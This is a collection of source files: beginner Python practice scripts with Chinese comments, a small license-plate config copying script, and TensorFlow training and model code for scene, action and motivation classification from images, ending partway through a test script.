print("="*60)
dic = dict([("zhangqiang", 19), ("lishi", 20), ("wangwu", 21)]) # 构造函数dict()直接从元阻列表中构建字典
print(dic)
dic2 = dict(zhangsan=18, lisi=19, wangwu=20, zhaoliu=21) # 关键字指定键值对
print(dic2)
# enumerate 获取索引
print("="*60)
for i, x in enumerate(['zhangsan', 'lishi', 'wangwu', 1, 2, 3]):
print(i, x)
# zip() 同时遍历多个序列
questions = ['name', 'age', 'color']
answer = ['zhangsan', 19, 'blue']
for q, a in zip(questions, answer):
print("what is your {0}, It is {1}".format(q, a))
# reversed() 反转
for i in reversed(range(1, 10, 2)):
print(i, end=" ")
print()
# sorted 排序,不修改原值
basket = ['apple', 'orange', 'apple', 'pear', 'orange', 'banana']
sor = sorted(basket)
print(sor)
# set 去重
for f in sorted(set(basket)):
print(f)
```
#### File: practice/qiang07_mode/q03_fibo.py
```python
def fibo(n):
a, b = 0, 1
while b < n:
print(b, end=" ")
a, b = b, a+b
print()
def fibo2(m):
a, b = 0, 1
fibo_list = list()
while b < m:
fibo_list.append(b)
a, b = b, a+b
print()
return fibo_list
```
#### File: practice/qiang11_instance/q02_calendar.py
```python
import calendar
# year = int(input('请输入年份:'))
# if (year % 4 == 0) and (year % 100 != 0) or (year % 400 == 0):
# print('{}为闰年'.format(year))
# else:
# print('{}不是闰年'.format(year)) #
def calendar_data(year):
if calendar.isleap(year):
print('{}为闰年'.format(year))
else:
print('{}不是闰年'.format(year))
calendar_data(2000)
calendar_data(1999)
```
#### File: practice/qiang11_instance/q04_common_divisor.py
```python
def common_divisor(x, y):
if x > y:
minimum = y
else:
minimum = x
for i in range(1, minimum+1):
if (x % i == 0) and (y % i == 0):
common_num = i
return common_num
print('两数的最大公约数为:{}'.format(common_divisor(54, 24)))
# 公约数
# for i in range(1, 55):
# if 54 % i == 0:
# print(i)
def lcm(x, y):
if x > y:
bigger_num = x
else:
bigger_num = y
while True:
if (bigger_num % x == 0) and (bigger_num % y == 0):
return bigger_num
break
else:
bigger_num += 1
num = lcm(24, 54)
print('两数的最小公倍数为:{}'.format(num))
```
#### File: practice/qiang11_instance/q06_calendar.py
```python
import calendar
# yy = int(input("请输入年份:"))
# mm = int(input("请输入月份:"))
#
# cale = calendar.month(yy, mm) # 输出日历
# print(cale)
import datetime
cale1 = calendar.month(2019, 6) # 打印日历
print(cale1)
month_range = calendar.monthrange(2019, 6) # 打印日历天数,返回元阻,第一参数(0-6)对应该星期几
print(month_range)
def getYesterday():
'''获取昨天日期'''
today = datetime.date.today() # 今天
oneday = datetime.timedelta(days=1) # 一天
yesterday = today - oneday
return yesterday
Today = datetime.date.today() # 今天
print(Today)
print(getYesterday())
# 方法二 简洁
def getYesterday2():
yesterday = datetime.date.today() + datetime.timedelta(-1)
return yesterday
print(datetime.timedelta(-1)) # 负一天
print(getYesterday2())
```
#### File: practice/qiang11_instance/q19_list_clear.py
```python
lst = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print(lst)
lst.clear()
print(lst)
# copy
def copylist(lst):
new_lst = lst[:]
return new_lst
li = [1, 2, 3, 4, 5, 6, 7]
print("原列表:", li)
print('现列表:', copylist(li))
# extend() =====================
def li_extend(lst):
li_copy = []
li_copy.extend(lst)
return li_copy
li = [22, 33, 4, 88, 99]
new_li = li_extend(li)
print('原列表:', li)
print('新列表:', new_li)
# list() ======================
def list_copy2(li):
cp_list = list(li)
return cp_list
li = [1, 3, 4, 6, 7, 9]
li2 = list_copy2(li)
print('原列表:', li)
print('新列表:', li2)
```
#### File: practice/qiang12_instance2/q01_str_code.py
```python
def exec_code():
Code = '''
for i in range(101):
print(i, end=' ')
print()
'''
exec(Code)
exec_code()
# 字符串翻转
str = 'Zhangqiang'
print(str[::-1])
print(type(str))
print(reversed(str))
print(''.join(str))
print(''.join(reversed(str)))
# 对字符串切片及翻转
def reverse1(str2, num=2):
Lfirst = str2[0: num]
Lsecond = str2[num: len(str2)]
Rfirst = str2[0:-num]
Rsecond = str2[-num:len(str2)]
print('Rfirst:', Rfirst) # Rfirst: Runo
print('Rsecond:', Rsecond) # Rsecond: ob
print('times1:', Lsecond + Lfirst) # times1: noobRu
print('times2:', Rsecond + Rfirst) # times2: obRuno
if __name__ == "__main__":
str2 = 'Runoob'
reverse1(str2)
# 按键(key)或值(value)对字典进行排序
def sorted_dict():
key_value = dict()
key_value[2] = 56
key_value[1] = 2
key_value[5] = 12
key_value[4] = 24
key_value[8] = 18
key_value[3] = 323
print('按键排序:', key_value)
print(sorted(key_value))
for i in sorted(key_value):
print('sorted:', (i, key_value[i]), end=' ')
print()
print('items_value:', sorted(key_value.items(), key=lambda kv: (kv[1], kv[0])))
sorted_dict()
# 字典列表排序
lis = [{"name": "Taobao", "age": 100},
{"name": "Runoob", "age": 7},
{"name": "Google", "age": 100},
{"name": "Wiki", "age": 200}]
print('sorted_age:', sorted(lis, key=lambda i: i['age']))
print('\r')
print('sorted_age_name:', sorted(lis, key=lambda k: (k['age'], k['name'])))
print('sorted_reverse_by_age:', sorted(lis, key=lambda a: a['age'], reverse=True))
# 计算字典值之和
def dict_sum():
dict = {'a': 100, 'b': 200, 'c': 300}
count = 0
for k, v in dict.items():
count += v
print('dict_sum:', count)
dict_sum()
def dict_sum2():
dict = {'a': 100, 'b': 200, 'c': 300}
count = 0
for i in dict:
count += dict[i]
print('dict_sum2:', count)
dict_sum2()
# 移除字典键值对
test_dict = {"Runoob": 1, "Google": 2, "Taobao": 3, "Zhihu": 4}
# del
# del test_dict['Google']
# pop
# pop_value = test_dict.pop('Zhihu')
# print('pop_value:', pop_value)
print(test_dict.pop('ZhangSan', 'None_key'))
print('test_dict:', test_dict)
new_dict = {k: v for k, v in test_dict.items() if k != 'Zhihu'}
print(new_dict)
```
#### File: practice/qiang12_instance2/q04_line_search.py
```python
def search(arr, x, n):
for i in range(n):
if arr[i] == x:
print('exist')
return i
else:
return -1
if __name__ == "__main__":
arr = ['A', 'B', 'C', 'D', 'E']
x = 'E'
n = len(arr)
result = search(arr, x, n)
if result != -1:
print('存在,查找的索引为:{}'.format(result))
else:
print('不存在')
```
#### File: practice/qiang13_working/q09_list_select.py
```python
def select_ele(li):
for i in li:
if i == 4 or i == "4":
li.remove(i)
return li
if __name__ == "__main__":
l1 = [1, 2, 3, 4, 5, "4", 6, 7, 8, 9]
print(select_ele(l1))
# 方法二
def select_ele2(li, n=0):
while n < len(li): # 逐个遍历,规避 for 循环漏掉
for i in li:
if i == 4 or i == '4':
li.remove(i)
n += 1
return li
l1 = [1, 2, 3, 4, 5, "4", 6, 7, 8, 9]
print(select_ele2(l1))
```
#### File: practice/qiang13_working/q13_Pipe.py
```python
from multiprocessing import Pipe, Process
# https://www.jianshu.com/p/a4ac0c478be7
# 子进程函数 执行方法
def foo(subconn):
print('from parent_conn:', subconn.recv())
subconn.send('吃了的')
if __name__ == "__main__":
# 创建管道两端
parent_conn, child_conn = Pipe()
# 创建子进程
p = Process(target=foo, args=(child_conn, ))
# 运行子进程
p.start()
# 进程间数据传递
parent_conn.send('吃了么')
print('from chile_conn:', parent_conn.recv())
# 等待进程执行完后关闭
p.join()
```
#### File: practice/qiang13_working/q17_singleton.py
```python
class Singleton2(type):
def __call__(cls, *args, **kwargs):
if not hasattr(cls, '_instance1'):
cls._instance1 = super(Singleton2, cls).__call__(*args, **kwargs)
return cls._instance1
# class B(object): # py2
class B(metaclass=Singleton2): # py3
__metaclass__ = Singleton2
e = B()
f = B()
print(e)
print(f)
print(e is f)
``` |
{
"source": "13528770807/python_script",
"score": 3
} |
#### File: testfield_lpr_data/lpr_data/qiang.py
```python
import shutil
import sys
class Place:
def __init__(self, num):
self.num = num
self.place1 = './license_plate/ZABC255/lp_database.txt'
self.place2 = './license_plate/ZB53Y11/lp_database.txt'
self.place3 = './license_plate/ZC796YR/lp_database.txt'
self.place4 = './license_plate/ZD8789H/lp_database.txt'
self.place5 = './license_plate/HC05EV8/lp_database.txt'
self.placeAll = './license_plate/All/lp_database.txt'
self.destination = '../lpr_config/'
def change(self):
if self.num == '1':
print('禁止通行车辆:浙ABC255')
shutil.copy(self.place1, self.destination)
elif self.num == '2':
print('禁止通行车辆:浙B53Y11')
shutil.copy(self.place2, self.destination)
elif self.num == '3':
print('禁止通行车辆:浙C796YR')
shutil.copy(self.place3, self.destination)
elif self.num == '4':
print('禁止通行车辆:浙D8789H')
shutil.copy(self.place4, self.destination)
elif self.num == '5':
print('禁止通行车辆:沪C05EV8')
shutil.copy(self.place5, self.destination)
else:
print('全部通行')
shutil.copy(self.placeAll, self.destination)
if __name__ == "__main__":
num = sys.argv[1]
p = Place(num)
p.change()
``` |
{
"source": "13551132330/Joint-Perception-Learning-and-Causal-Reasoning-for-Motivation-Understanding-in-Images",
"score": 2
} |
#### File: 13551132330/Joint-Perception-Learning-and-Causal-Reasoning-for-Motivation-Understanding-in-Images/baseline_multi.py
```python
import os
import time
import numpy
from six.moves import xrange # pylint: disable=redefined-builtin
from get_data_step2 import input_data
import tensorflow as tf
import model
import math
import vgg16
import numpy as np
flags = tf.app.flags
flags.DEFINE_integer('max_steps',20000, 'Number of steps to run trainer.')
flags.DEFINE_integer('batch_size',16 , 'Batch size.')
FLAGS = flags.FLAGS
MOVING_AVERAGE_DECAY = 0.9999
gpu_num = 1
def placeholder_inputs(batch_size):
#bulit placeholder_inputs
images_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
model.IMAGE_SIZE,
model.IMAGE_SIZE,
model.CHANNELS))
sc_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
ac_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
mc_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
keep_pro = tf.placeholder(tf.float32)
return images_placeholder,sc_labels_placeholder,ac_labels_placeholder,mc_labels_placeholder,keep_pro
def average_gradients(tower_grads):
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, _ in grad_and_vars:
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
grad = tf.concat(grads, 0)
grad = tf.reduce_mean(grad, 0)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def tower_loss(name_scope, logit, sc_labels,ac_labels,mc_labels):
sc_labels = tf.one_hot(sc_labels,100,on_value=1,off_value=None,axis=1)
ac_labels = tf.one_hot(ac_labels,100,on_value=1,off_value=None,axis=1)
mc_labels = tf.one_hot(mc_labels,256,on_value=1,off_value=None,axis=1)
labels = tf.concat([sc_labels,ac_labels,mc_labels],1)
cross_entropy_mean = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=labels,logits=logit)
)
tf.summary.scalar(
name_scope + '_cross_entropy',
cross_entropy_mean
)
weight_decay_loss = tf.get_collection('weightdecay_losses')
tf.summary.scalar(name_scope + '_weight_decay_loss', tf.reduce_mean(weight_decay_loss) )
# Calculate the total loss for the current tower.
total_loss = cross_entropy_mean
tf.summary.scalar(name_scope + '_total_loss', tf.reduce_mean(total_loss) )
return total_loss
def tower_acc(logit, labels):
correct_pred = tf.equal(tf.argmax(logit, 1), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
return accuracy
def topk_acc(logit, labels , k):
list=tf.nn.in_top_k(logit,labels,k)
in_top1 = tf.to_float(list)
num_correct = tf.reduce_sum(in_top1)
return num_correct/ 16
def _variable_on_cpu(name, shape, initializer):
with tf.device('/cpu:0'):
var = tf.get_variable(name, shape, initializer=initializer)
return var
def _variable_with_weight_decay(name, shape, wd):
var = _variable_on_cpu(name, shape, tf.contrib.layers.xavier_initializer())
if wd is not None:
weight_decay = tf.nn.l2_loss(var)*wd
tf.add_to_collection('weightdecay_losses', weight_decay)
return var
def run_training():
# Get the sets of images and labels for training, validation, and
# Tell TensorFlow that the model will be built into the default Graph.
# Create model directory
print ('loading and init vgg16.........')
vgg=vgg16.Vgg16()
with tf.Graph().as_default():
global_step = tf.get_variable(
'global_step',
[],
initializer=tf.constant_initializer(0),
trainable=False
)
images_placeholder,sc_labels_placeholder,ac_labels_placeholder,mc_labels_placeholder,keep_pro = placeholder_inputs(
FLAGS.batch_size * gpu_num
)
tower_grads1 = []
tower_grads2 = []
tower_grads3 = []
multi_logits = []
learning_rate=tf.train.exponential_decay(1e-4,global_step,decay_steps=FLAGS.max_steps/50,decay_rate=0.99,staircase=True)
tf.summary.scalar('learning_rate', learning_rate)
opt_multi = tf.train.AdamOptimizer(learning_rate)
with tf.variable_scope('var_name') as var_scope:
multi_fea_weights = {
'w1': _variable_with_weight_decay('multi_w1', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('multi_feawout', [2048, 456], 0.005)
}
multi_fea_biases = {
'b1': _variable_with_weight_decay('multi_b1', [2048], 0.000),
'out': _variable_with_weight_decay('multi_feabout', [456], 0.000),
}
sc_fea_weights = {
'w1': _variable_with_weight_decay('sc_w1', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('sc_feawout', [2048, 100], 0.005)
}
sc_fea_biases = {
'b1': _variable_with_weight_decay('sc_b1', [2048], 0.000),
'out': _variable_with_weight_decay('sc_feabout', [100], 0.000),
}
ac_fea_weights = {
'w1': _variable_with_weight_decay('ac_w1', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('ac_feawout', [2048, 100], 0.005)
}
ac_fea_biases = {
'b1': _variable_with_weight_decay('ac_b1', [2048], 0.000),
'out': _variable_with_weight_decay('ac_feabout', [100], 0.000),
}
mc_fea_weights = {
'w1': _variable_with_weight_decay('mc_w1', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('mc_feawout', [2048, 256], 0.005)
}
mc_fea_biases = {
'b1': _variable_with_weight_decay('mc_b1', [2048], 0.000),
'out': _variable_with_weight_decay('mc_feabout', [256], 0.000),
}
for gpu_index in range(0, gpu_num):
with tf.device('/gpu:%d' % gpu_index):
varlist1 = [ multi_fea_weights.values(),multi_fea_biases.values() ]
vgg.build(images_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size,:,:,:])
train_features=vgg.fc7
multi_logit = model.get_predict(
train_features,
keep_pro,
FLAGS.batch_size,
multi_fea_weights,
multi_fea_biases
)
loss_name_scope = ('gpud_%d_loss' % gpu_index)
multi_loss = tower_loss(
'multi',
multi_logit,
sc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
ac_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
mc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size]
)
grads1 = opt_multi.compute_gradients(multi_loss, varlist1)
tower_grads1.append(grads1)
multi_logits.append(multi_logit)
multi_logits = tf.concat(multi_logits,0)
sc_logits = tf.slice(multi_logits,[0,0],[16,100])
sc_accuracy = topk_acc(sc_logits, sc_labels_placeholder ,5)
#sc_accuracy = tower_acc(sc_logits, sc_labels_placeholder)
tf.summary.scalar('sc_accuracy', sc_accuracy)
ac_logits = tf.slice(multi_logits,[0,100],[16,100])
ac_accuracy = topk_acc(ac_logits, ac_labels_placeholder ,5)
#ac_accuracy = tower_acc(ac_logits, ac_labels_placeholder)
tf.summary.scalar('ac_accuracy', ac_accuracy)
mc_logits = tf.slice(multi_logits,[0,200],[16,256])
mc_accuracy = topk_acc(mc_logits, mc_labels_placeholder ,5)
#mc_accuracy = tower_acc(mc_logits, mc_labels_placeholder)
tf.summary.scalar('mc_accuracy', mc_accuracy)
grads1 = average_gradients(tower_grads1)
apply_gradient_multi = opt_multi.apply_gradients(grads1, global_step=global_step)
train_multi = tf.group(apply_gradient_multi)
null_op = tf.no_op()
# Create a saver for writing training checkpoints.
saver = tf.train.Saver(multi_fea_weights.values() + multi_fea_biases.values())
init = tf.global_variables_initializer()
# Create a session for running Ops on the Graph.
sess = tf.Session(
config=tf.ConfigProto(allow_soft_placement=True)
)
sess.run(init)
# Create summary writter
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter('./visual_logs/baseline_multi_visual_logs/train', sess.graph)
test_writer = tf.summary.FileWriter('./visual_logs/baseline_multi_visual_logs/test', sess.graph)
for step in xrange(FLAGS.max_steps+1):
start_time = time.time()
train_actions,train_images,train_ac_labels,train_sc_labels,train_mc_labels, _, _= input_data(
filename='./list/train.list',
batch_size=FLAGS.batch_size * gpu_num,
start_pos=-1,
shuffle=True
)
sess.run(train_multi, feed_dict={
images_placeholder: train_images,
sc_labels_placeholder: train_sc_labels,
ac_labels_placeholder: train_ac_labels,
mc_labels_placeholder: train_mc_labels,
keep_pro : 0.5
})
duration = time.time() - start_time
print('Batchnum %d: %.3f sec' % (step, duration))
if (step) %50 == 0 or (step + 1) == FLAGS.max_steps:
print('Step %d/%d: %.3f sec' % (step,FLAGS.max_steps, duration))
print('Training Data Eval:')
summary,sc_acc,ac_acc,mc_acc,multi_loss_value= sess.run(
[merged,sc_accuracy,ac_accuracy,mc_accuracy,multi_loss],
feed_dict={ images_placeholder: train_images,
ac_labels_placeholder: train_ac_labels,
sc_labels_placeholder: train_sc_labels,
mc_labels_placeholder: train_mc_labels,
keep_pro : 1
})
print ("sc_accuracy: " + "{:.5f}".format(sc_acc))
print ("ac_accuracy: " + "{:.5f}".format(ac_acc))
print ("mc_accuracy: " + "{:.5f}".format(mc_acc))
print 'multi_loss= %.2f'% np.mean(multi_loss_value)
train_writer.add_summary(summary, step)
if (step) %100 == 0 or (step + 1) == FLAGS.max_steps:
print('Validation Data Eval:')
val_actions,val_images,val_ac_labels,val_sc_labels,val_mc_labels, _, _= input_data(
filename='./list/test.list',
start_pos=-1,
batch_size=FLAGS.batch_size * gpu_num,
shuffle=True)
summary,sc_acc,ac_acc,mc_acc,multi_loss_value = sess.run(
[merged,sc_accuracy,ac_accuracy,mc_accuracy,multi_loss],
feed_dict={
images_placeholder: val_images,
ac_labels_placeholder: val_ac_labels,
sc_labels_placeholder: val_sc_labels,
mc_labels_placeholder: val_mc_labels,
keep_pro : 1
})
print ("sc_accuracy: " + "{:.5f}".format(sc_acc))
print ("ac_accuracy: " + "{:.5f}".format(ac_acc))
print ("mc_accuracy: " + "{:.5f}".format(mc_acc))
print 'multi_loss= %.2f'% np.mean(multi_loss_value)
test_writer.add_summary(summary, step)
# Save the model checkpoint periodically.
if step > 1 and step % 2000 == 0:
checkpoint_path = os.path.join('./models/baseline_multi_models', 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=global_step)
print("done")
def main(_):
run_training()
if __name__ == '__main__':
tf.app.run()
```
#### File: 13551132330/Joint-Perception-Learning-and-Causal-Reasoning-for-Motivation-Understanding-in-Images/model.py
```python
import tensorflow as tf
import vgg16
SCNUM_CLASSES =100
ACNUM_CLASSES =100
MCNUM_CLASSES =256
INPUT_SIZE =4800
IMAGE_SIZE =224
FEATURE_SIZE = 4096
CHANNELS = 3
def batchnorm(Ylogits, is_test, iteration, offset, convolutional=False):
exp_moving_avg = tf.train.ExponentialMovingAverage(0.999, iteration) # adding the iteration prevents from averaging across non-existing iterations
bnepsilon = 1e-5
if convolutional:
mean, variance = tf.nn.moments(Ylogits, [0, 1, 2])
else:
mean, variance = tf.nn.moments(Ylogits, [0])
update_moving_averages = exp_moving_avg.apply([mean, variance])
m = tf.cond(is_test, lambda: exp_moving_avg.average(mean), lambda: mean)
v = tf.cond(is_test, lambda: exp_moving_avg.average(variance), lambda: variance)
Ybn = tf.nn.batch_normalization(Ylogits, m, v, offset, None, bnepsilon)
return Ybn, update_moving_averages
def get_feature(_F, _dropout, batch_size, _weights, _biases):
# Output: class prediction
feature = tf.matmul(_F, _weights['w1']) + _biases['b1']
feature = tf.nn.relu(feature, name='fc1')
feature = tf.nn.dropout(feature, _dropout)
feature = tf.matmul(feature, _weights['out']) + _biases['out'] #NUM_CLASSES
feature = tf.nn.relu(feature, name='fc2') # Relu activation
feature = tf.nn.dropout(feature, _dropout)
return feature
def get_predict(_F, _dropout, batch_size, _weights, _biases):
feature = tf.matmul(_F, _weights['w1']) + _biases['b1']
feature = tf.nn.relu(feature, name='fc1')
feature = tf.nn.dropout(feature, _dropout)
feature = tf.matmul(feature, _weights['out']) + _biases['out'] #NUM_CLASSES
return feature
def sc_model(_X, _dropout, batch_size, _weights, _biases):
#get Us
sc = tf.matmul(_X, _weights['w1']) + _biases['b1']
sc = tf.nn.relu(sc, name='fc1')
sc = tf.nn.dropout(sc, _dropout)
sc = tf.matmul(sc, _weights['w2']) + _biases['b2']
sc = tf.nn.relu(sc, name='fc2')
sc = tf.nn.dropout(sc, _dropout)
sc = tf.matmul(sc, _weights['out']) + _biases['out'] #NUM_CLASSES
# sigmoid (Us)
sc = tf.nn.sigmoid(sc, name='sigmoid') # sigmoid
return sc
def ac_model(_Z, sc , _dropout, batch_size, _weights, _biases):
#get Ua
ac = tf.matmul(_Z, _weights['w1']) + _biases['b1']
ac = tf.nn.relu(ac, name='fc1')
ac = tf.nn.dropout(ac, _dropout)
ac = tf.matmul(ac, _weights['w2']) + _biases['b2']
ac = tf.nn.relu(ac, name='fc2')
ac = tf.nn.dropout(ac, _dropout)
ac = tf.matmul(ac, _weights['out']) + _biases['out'] #NUM_CLASSES
ac = tf.nn.relu(ac, name='out') # Relu activation
# W_Ua * Ua
ac = tf.transpose(ac, perm=[1,0])
ac = tf.matmul(_weights['W_Ua'], ac)
ac = tf.transpose(ac, perm=[1,0])
# W_alpha * Ys
if sc.shape==[batch_size]:
sc = tf.one_hot(sc,100,on_value=1,off_value=None,axis=1)
sc = tf.cast(sc, tf.float32)
sc = tf.transpose(sc, perm=[1,0])
sc = tf.matmul(_weights['W_alpha'], sc)
sc = tf.transpose(sc, perm=[1,0])
# sigmoid (W_alpha * Ys + W_Ua * Ua)
ac = tf.add_n([ac, sc])
ac = tf.nn.sigmoid(ac, name='sigmoid') # sigmoid
return ac
def mc_model(_Y, sc , ac, _dropout, batch_size, _weights, _biases ):
#get Ua
mc = tf.matmul(_Y, _weights['w1']) + _biases['b1']
mc = tf.nn.relu(mc, name='fc1')
mc = tf.nn.dropout(mc, _dropout)
mc = tf.matmul(mc, _weights['w2']) + _biases['b2']
mc = tf.nn.relu(mc, name='fc2')
mc = tf.nn.dropout(mc, _dropout)
mc = tf.matmul(mc, _weights['out']) + _biases['out'] #NUM_CLASSES
mc = tf.nn.relu(mc, name='out') # Relu activation
# W_Um * Um
mc = tf.transpose(mc, perm=[1,0])
mc = tf.matmul(_weights['W_Um'], mc)
mc = tf.transpose(mc, perm=[1,0])
# W_beta * Ya + W_gama * Ys
if sc.shape==[batch_size]:
sc = tf.one_hot(sc,100,on_value=1,off_value=None,axis=1)
sc = tf.cast(sc, tf.float32)
ac = tf.one_hot(ac,100,on_value=1,off_value=None,axis=1)
ac = tf.cast(ac, tf.float32)
ac = tf.transpose(ac, perm=[1,0])
sc = tf.transpose(sc, perm=[1,0])
ac_sc = tf.add_n([tf.matmul(_weights['W_beta'], ac),tf.matmul(_weights['W_gama'], sc)])
ac_sc = tf.transpose(ac_sc, perm=[1,0])
# sigmoid (W_beta * Ya + W_gama * Ys + W_Um * Um)
mc = tf.add_n([mc,ac_sc])
mc = tf.nn.sigmoid(mc, name='sigmoid') # sigmoid
return mc
def sc_model2(_X, _dropout, batch_size, _weights, _biases ,globle_step):
#get Us
if _dropout==0.5:
tst=False
tst=tf.cast(tst, tf.bool)
else:
tst=True
tst=tf.cast(tst, tf.bool)
sc = tf.matmul(_X, _weights['w2'])
sc, update_ema1 = batchnorm(sc, tst, globle_step, _biases['b2'])
sc = tf.nn.relu(sc, name='fc2')
sc = tf.nn.dropout(sc, _dropout)
sc = tf.matmul(sc, _weights['out']) + _biases['out'] #NUM_CLASSES
# sigmoid (Us)
sc = tf.nn.sigmoid(sc, name='sigmoid') # sigmoid
return sc,update_ema1
def ac_model2(_Z, sc , _dropout, batch_size, _weights, _biases ,globle_step):
#get Ua
if _dropout==0.5:
tst=False
tst=tf.cast(tst, tf.bool)
else:
tst=True
tst=tf.cast(tst, tf.bool)
ac = tf.matmul(_Z, _weights['w2'])
ac, update_ema1 = batchnorm(ac, tst, globle_step, _biases['b2'])
ac = tf.nn.relu(ac, name='fc2')
ac = tf.nn.dropout(ac, _dropout)
ac = tf.matmul(ac, _weights['out'])#NUM_CLASSES
ac, update_ema2 = batchnorm(ac, tst, globle_step, _biases['out'])
ac = tf.nn.relu(ac, name='out') # Relu activation
# W_Ua * Ua
ac = tf.transpose(ac, perm=[1,0])
ac = tf.matmul(_weights['W_Ua'], ac)
ac = tf.transpose(ac, perm=[1,0])
# W_alpha * Ys
if sc.shape==[batch_size]:
sc = tf.one_hot(sc,100,on_value=1,off_value=None,axis=1)
sc = tf.cast(sc, tf.float32)
sc = tf.transpose(sc, perm=[1,0])
sc = tf.matmul(_weights['W_alpha'], sc)
sc = tf.transpose(sc, perm=[1,0])
# sigmoid (W_alpha * Ys + W_Ua * Ua)
ac = tf.add_n([ac, sc])
ac = tf.nn.sigmoid(ac, name='sigmoid') # sigmoid
return ac,update_ema1,update_ema2
def mc_model2(_Y, sc , ac, _dropout, batch_size, _weights, _biases ,globle_step):
#get Ua
if _dropout==0.5:
tst=False
tst=tf.cast(tst, tf.bool)
else:
tst=True
tst=tf.cast(tst, tf.bool)
mc = tf.matmul(_Y, _weights['w2'])
mc, update_ema1 = batchnorm(mc, tst, globle_step, _biases['b2'])
mc = tf.nn.relu(mc, name='fc2')
mc = tf.nn.dropout(mc, _dropout)
mc = tf.matmul(mc, _weights['out']) #NUM_CLASSES
mc, update_ema2 = batchnorm(mc, tst, globle_step, _biases['out'])
mc = tf.nn.relu(mc, name='out') # Relu activation
# W_Um * Um
mc = tf.transpose(mc, perm=[1,0])
mc = tf.matmul(_weights['W_Um'], mc)
mc = tf.transpose(mc, perm=[1,0])
# W_beta * Ya + W_gama * Ys
if sc.shape==[batch_size]:
sc = tf.one_hot(sc,100,on_value=1,off_value=None,axis=1)
sc = tf.cast(sc, tf.float32)
if ac.shape==[batch_size]:
ac = tf.one_hot(ac,100,on_value=1,off_value=None,axis=1)
ac = tf.cast(ac, tf.float32)
ac = tf.transpose(ac, perm=[1,0])
sc = tf.transpose(sc, perm=[1,0])
ac_sc = tf.add_n([tf.matmul(_weights['W_beta'], ac),tf.matmul(_weights['W_gama'], sc)])
ac_sc = tf.transpose(ac_sc, perm=[1,0])
# sigmoid (W_beta * Ya + W_gama * Ys + W_Um * Um)
mc = tf.add_n([mc,ac_sc])
mc = tf.nn.sigmoid(mc, name='sigmoid') # sigmoid
return mc,update_ema1,update_ema2
```
#### File: 13551132330/Joint-Perception-Learning-and-Causal-Reasoning-for-Motivation-Understanding-in-Images/test_step1.py
```python
import os
import time
import numpy
from six.moves import xrange # pylint: disable=redefined-builtin
from get_data_step1 import input_data
import tensorflow as tf
import model
import math
import numpy as np
flags = tf.app.flags
flags.DEFINE_integer('max_steps',421, 'Number of steps to run trainer.')
flags.DEFINE_integer('batch_size',6 , 'Batch size.')
FLAGS = flags.FLAGS
MOVING_AVERAGE_DECAY = 0.9999
pre_model_save_dir = './models/step1_models'
gpu_num = 1
def placeholder_inputs(batch_size):
#bulit placeholder_inputs
actions_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
model.INPUT_SIZE,
))
scenes_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
model.INPUT_SIZE,
))
motivations_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
model.INPUT_SIZE,
))
ac_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
sc_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
mc_labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
keep_pro = tf.placeholder(tf.float32)
return actions_placeholder,scenes_placeholder,motivations_placeholder,ac_labels_placeholder,sc_labels_placeholder,mc_labels_placeholder,keep_pro
def average_gradients(tower_grads):
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, _ in grad_and_vars:
expanded_g = tf.expand_dims(g, 0)
grads.append(expanded_g)
grad = tf.concat(grads, 0)
grad = tf.reduce_mean(grad, 0)
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def tower_loss(name_scope, logit, labels, classic):
labels=tf.one_hot(labels,classic,on_value=1,off_value=None,axis=1)
#print labels.shape
cross_entropy_mean = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=labels,logits=logit)
)
tf.summary.scalar(
name_scope + '_cross_entropy',
cross_entropy_mean
)
weight_decay_loss = tf.get_collection('weightdecay_losses')
tf.summary.scalar(name_scope + '_weight_decay_loss', tf.reduce_mean(weight_decay_loss) )
# Calculate the total loss for the current tower.
total_loss = cross_entropy_mean
tf.summary.scalar(name_scope + '_total_loss', tf.reduce_mean(total_loss) )
return total_loss
def tower_acc(logit, labels):
correct_pred = tf.equal(tf.argmax(logit, 1), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
return accuracy
def topk_acc(logit, labels , k):
list=tf.nn.in_top_k(logit,labels,k)
in_top1 = tf.to_float(list)
num_correct = tf.reduce_sum(in_top1)
return num_correct/ 6
def _variable_on_cpu(name, shape, initializer):
with tf.device('/cpu:0'):
var = tf.get_variable(name, shape, initializer=initializer)
return var
def _variable_with_weight_decay(name, shape, wd):
var = _variable_on_cpu(name, shape, tf.contrib.layers.xavier_initializer())
if wd is not None:
weight_decay = tf.nn.l2_loss(var)*wd
tf.add_to_collection('weightdecay_losses', weight_decay)
return var
def run_training():
# Get the sets of images and labels for training, validation, and
# Tell TensorFlow that the model will be built into the default Graph.
# Create model directory
with tf.Graph().as_default():
global_step = tf.get_variable(
'global_step',
[],
initializer=tf.constant_initializer(0),
trainable=False
)
